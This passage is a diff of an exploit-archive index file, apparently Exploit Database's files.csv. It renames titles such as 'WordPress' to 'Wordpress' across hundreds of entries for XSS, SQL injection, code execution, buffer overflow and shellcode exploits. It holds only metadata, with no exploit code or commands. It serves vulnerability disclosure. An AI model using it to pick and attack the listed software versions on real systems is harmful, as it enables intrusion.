'option' HTML Element Integer Overflow",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0 -35285,platforms/php/webapps/35285.txt,"WordPress Feature Slideshow Plugin 1.0.6 - 'src' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 -35286,platforms/php/webapps/35286.txt,"WordPress BezahlCode Generator Plugin 1.0 - 'gen_name' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35285,platforms/php/webapps/35285.txt,"Wordpress Feature Slideshow Plugin 1.0.6 - 'src' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35286,platforms/php/webapps/35286.txt,"Wordpress BezahlCode Generator Plugin 1.0 - 'gen_name' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Persistent Cross-Site Scripting",2014-11-17,spyk2r,php,webapps,80 35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",xml,webapps,80 35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80 35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 -35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0 +35279,platforms/osx/dos/35279.html,"Safari 8.0 / OSX 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0 35280,platforms/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0 35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0 35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser - Remote Code Execution",2014-11-18,Metasploit,android,remote,0 35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin - PHP Code Injection",2014-11-18,Metasploit,php,remote,80 -35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 +35300,platforms/php/webapps/35300.txt,"Wordpress TagNinja Plugin 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin) Exploit",2014-11-19,LiquidWorm,php,webapps,80 35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 - Path Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 @@ -31819,7 +31819,7 @@ id,file,description,date,author,platform,type,port 35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",php,webapps,80 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 35323,platforms/php/webapps/35323.md,"MyBB 1.8.2 - unset_globals() Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps,0 -35324,platforms/php/webapps/35324.txt,"WordPress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 +35324,platforms/php/webapps/35324.txt,"Wordpress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - Win32k.sys Denial of Service",2014-11-22,Kedamsky,windows,dos,0 35380,platforms/php/remote/35380.rb,"Pandora Fms - SQL Injection Remote Code Execution",2014-11-26,Metasploit,php,remote,80 @@ -31836,8 +31836,8 @@ id,file,description,date,author,platform,type,port 35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 - print_list.php Multiple Parameter Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Denial of Service (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0 -35340,platforms/php/webapps/35340.txt,"WordPress wpDataTables Plugin 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps,0 -35341,platforms/php/webapps/35341.py,"WordPress wpDataTables Plugin 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",php,webapps,0 +35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps,0 +35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",php,webapps,0 35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection",2014-11-24,"ZoRLu Bugrahan",aix,dos,0 35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0 35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 @@ -31864,31 +31864,31 @@ id,file,description,date,author,platform,type,port 35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 35370,platforms/linux/local/35370.c,"Linux Kernel 3.14.5 (RHEL / CentOS 7) - 'libfutex' Privilege Escalation",2014-11-25,"Kaiqu Chen",linux,local,0 -35371,platforms/php/webapps/35371.txt,"WordPress Google Document Embedder 2.5.14 Plugin - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 +35371,platforms/php/webapps/35371.txt,"Wordpress Google Document Embedder 2.5.14 Plugin - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 -35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 - 'wpfn' Parameter Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0 +35373,platforms/php/webapps/35373.txt,"Wordpress GD Star Rating Plugin 1.9.7 - 'wpfn' Parameter Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0 35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 - 'stcenter.nsf' Cross-Site Scripting",2011-02-22,andrew,php,webapps,0 35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Parameter Cross-Site Scripting",2011-02-22,"Aung Khant",php,webapps,0 35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Inclusion",2011-02-16,"AutoSec Tools",php,webapps,0 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 -35378,platforms/php/webapps/35378.txt,"WordPress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 +35378,platforms/php/webapps/35378.txt,"Wordpress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 -35385,platforms/php/webapps/35385.pl,"WordPress Plugin Slider Revolution 3.0.95 /Showbiz Pro 1.7.1 - Arbitrary File Upload",2014-11-26,"Simo Ben Youssef",php,webapps,80 +35385,platforms/php/webapps/35385.pl,"Wordpress Plugin Slider Revolution 3.0.95 /Showbiz Pro 1.7.1 - Arbitrary File Upload",2014-11-26,"Simo Ben Youssef",php,webapps,80 35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Privilege Escalation",2011-02-24,"Dominik George",linux,remote,0 35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting",2011-02-25,"Aung Khant",php,webapps,0 35395,platforms/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement 7.1 - Privilege Escalation",2014-11-28,"Information Paradox",windows,local,0 35391,platforms/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 - 'users.php' SQL Injection",2011-02-25,H3X,php,webapps,0 -35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 -35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 -35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 +35392,platforms/php/webapps/35392.txt,"Wordpress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 +35393,platforms/php/webapps/35393.txt,"Wordpress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 +35394,platforms/php/webapps/35394.txt,"Wordpress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting",2011-02-23,MustLive,php,webapps,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0 -35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for WordPress - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 +35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for Wordpress - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 35401,platforms/php/webapps/35401.txt,"SnapProof - 'retPageID' Parameter Cross-Site Scripting",2011-02-28,"difficult 511",php,webapps,0 35402,platforms/php/webapps/35402.txt,"Forritun - Multiple SQL Injections",2011-03-02,eXeSoul,php,webapps,0 35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service",2011-03-02,"Nelson Elhage",linux,dos,0 @@ -31901,12 +31901,12 @@ id,file,description,date,author,platform,type,port 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,remote,0 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - Pages/login.aspx Language Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 -35413,platforms/php/dos/35413.php,"WordPress 4.0 - Denial of Service",2014-12-01,SECURELI.com,php,dos,80 -35414,platforms/php/dos/35414.txt,"WordPress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 +35413,platforms/php/dos/35413.php,"Wordpress 4.0 - Denial of Service",2014-12-01,SECURELI.com,php,dos,80 +35414,platforms/php/dos/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 35415,platforms/php/dos/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 - 'admin/upload-controler.php' Arbitrary File Upload",2011-03-08,"AutoSec Tools",php,webapps,0 -35418,platforms/php/webapps/35418.txt,"Inline Gallery WordPress Plugin 0.3.9 - 'do' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35418,platforms/php/webapps/35418.txt,"Inline Gallery Wordpress Plugin 0.3.9 - 'do' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35419,platforms/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",hardware,webapps,0 35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 @@ -31916,18 +31916,18 @@ id,file,description,date,author,platform,type,port 36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0 -35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 -35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries Wordpress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35430,platforms/php/webapps/35430.txt,"1 Flash Gallery Wordpress Plugin 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 - 'head.php' Cross-Site Scripting",2011-03-08,"Khashayar Fereidani",php,webapps,0 35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service",2011-03-01,"Buildbot Builder",linux,dos,0 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,osx,remote,0 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote,0 -35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 - 'image' Parameter Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 +35435,platforms/php/webapps/35435.txt,"Lazyest Gallery Wordpress Plugin 1.0.26 - 'image' Parameter Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 35436,platforms/php/webapps/35436.txt,"Xinha 0.96 - 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0 35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite - HTTP Packet Denial Of Service",2011-02-09,"Rodrigo Escobar",multiple,dos,0 35438,platforms/cgi/webapps/35438.txt,"CosmoShop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 -35439,platforms/php/webapps/35439.txt,"WordPress Nextend Facebook Connect Plugin 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80 -35440,platforms/osx/local/35440.rb,"Mac OS X - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 +35439,platforms/php/webapps/35439.txt,"Wordpress Nextend Facebook Connect Plugin 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80 +35440,platforms/osx/local/35440.rb,"Mac OSX - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 35441,platforms/multiple/remote/35441.rb,"Tincd - Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 @@ -31945,8 +31945,8 @@ id,file,description,date,author,platform,type,port 35455,platforms/php/webapps/35455.txt,"BoutikOne - rss_flash.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35456,platforms/php/webapps/35456.txt,"BoutikOne - rss_promo.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35457,platforms/php/webapps/35457.txt,"BoutikOne - rss_top10.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 -35459,platforms/php/webapps/35459.txt,"WordPress Cart66 Lite Ecommerce 1.5.1.17 Plugin - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 -35460,platforms/php/webapps/35460.txt,"CodeArt Google MP3 Player WordPress Plugin - File Disclosure Download",2014-12-03,"QK14 Team",php,webapps,80 +35459,platforms/php/webapps/35459.txt,"Wordpress Cart66 Lite Ecommerce 1.5.1.17 Plugin - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 +35460,platforms/php/webapps/35460.txt,"CodeArt Google MP3 Player Wordpress Plugin - File Disclosure Download",2014-12-03,"QK14 Team",php,webapps,80 35564,platforms/php/webapps/35564.txt,"DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection",2011-04-04,"kurdish hackers team",php,webapps,0 35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80 @@ -31960,8 +31960,8 @@ id,file,description,date,author,platform,type,port 35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS - 'page_info.php' SQL Injection",2011-03-16,H3X,php,webapps,0 35472,platforms/lin_x86-64/local/35472.txt,"Offset2lib - Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",lin_x86-64,local,0 35473,platforms/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",php,webapps,80 -35475,platforms/php/webapps/35475.txt,"WordPress Sodahead Polls Plugin 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 -35476,platforms/php/webapps/35476.txt,"WordPress Rating-Widget Plugin 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 +35475,platforms/php/webapps/35475.txt,"Wordpress Sodahead Polls Plugin 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 +35476,platforms/php/webapps/35476.txt,"Wordpress Rating-Widget Plugin 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 35477,platforms/php/webapps/35477.txt,"XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 - Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos,0 35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 - 'error' Parameter HTML Injection",2011-03-19,Hector.x90,php,webapps,0 @@ -31973,11 +31973,11 @@ id,file,description,date,author,platform,type,port 35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0 35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 -35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0 +35488,platforms/osx/local/35488.c,"Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 35492,platforms/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection",2014-12-08,BarrabravaZ,php,webapps,0 -35493,platforms/php/webapps/35493.txt,"WordPress Ajax Store Locator 1.2 Plugin - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0 +35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 Plugin - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0 35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injections",2014-12-10,Portcullis,php,webapps,80 35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 @@ -31989,11 +31989,11 @@ id,file,description,date,author,platform,type,port 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0 35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection",2011-04-27,"Alberto Revelli",jsp,webapps,0 -35673,platforms/php/webapps/35673.txt,"WordPress Daily Maui Photo Widget Plugin 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 -35674,platforms/php/webapps/35674.txt,"WordPress WP Photo Album Plugin 1.5.1 - 'id' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 +35673,platforms/php/webapps/35673.txt,"Wordpress Daily Maui Photo Widget Plugin 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 +35674,platforms/php/webapps/35674.txt,"Wordpress WP Photo Album Plugin 1.5.1 - 'id' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35675,platforms/php/webapps/35675.txt,"Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-27,"Emilio Pinna",php,webapps,0 35676,platforms/cgi/webapps/35676.txt,"BackupPC 3.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",cgi,webapps,0 -35505,platforms/php/webapps/35505.txt,"WordPress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0 +35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0 35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 35508,platforms/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection",2011-03-27,MustLive,php,webapps,0 @@ -32008,7 +32008,7 @@ id,file,description,date,author,platform,type,port 35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Parameter Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 - 'search.php' Cross-Site Scripting",2011-03-28,"kurdish hackers team",php,webapps,0 35557,platforms/php/webapps/35557.txt,"PHP-Fusion - 'article_id' Parameter SQL Injection",2011-04-04,KedAns-Dz,php,webapps,0 -35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 +35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 35520,platforms/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting / Multiple Local File Inclusion",2011-03-29,"AutoSec Tools",php,webapps,0 35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",php,webapps,0 @@ -32021,17 +32021,17 @@ id,file,description,date,author,platform,type,port 35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Denial of Service (.m3u)",2014-12-15,s-dz,windows,dos,0 35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Denial of Service (.lst)",2014-12-15,s-dz,windows,dos,0 35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos,0 -35533,platforms/php/webapps/35533.py,"WordPress Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",php,webapps,0 +35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",php,webapps,0 35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35535,platforms/php/webapps/35535.php,"PHPads 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x / 4.1.x / 4.2.x - Denial of Service",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0 35560,platforms/windows/remote/35560.txt,"RealNetworks GameHouse 'InstallerDlg.dll' 2.6.0.445 ActiveX Control - Multiple Vulnerabilities",2011-04-03,rgod,windows,remote,0 35561,platforms/php/webapps/35561.txt,"WPwizz AdWizz Plugin 1.0 - 'link' Parameter Cross-Site Scripting",2011-04-04,"John Leitch",php,webapps,0 -35562,platforms/php/webapps/35562.txt,"Placester WordPress Plugin 0.1 - 'ajax_action' Parameter Cross-Site Scripting",2011-04-03,"John Leitch",php,webapps,0 +35562,platforms/php/webapps/35562.txt,"Placester Wordpress Plugin 0.1 - 'ajax_action' Parameter Cross-Site Scripting",2011-04-03,"John Leitch",php,webapps,0 35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 - 'index.php' Arbitrary File 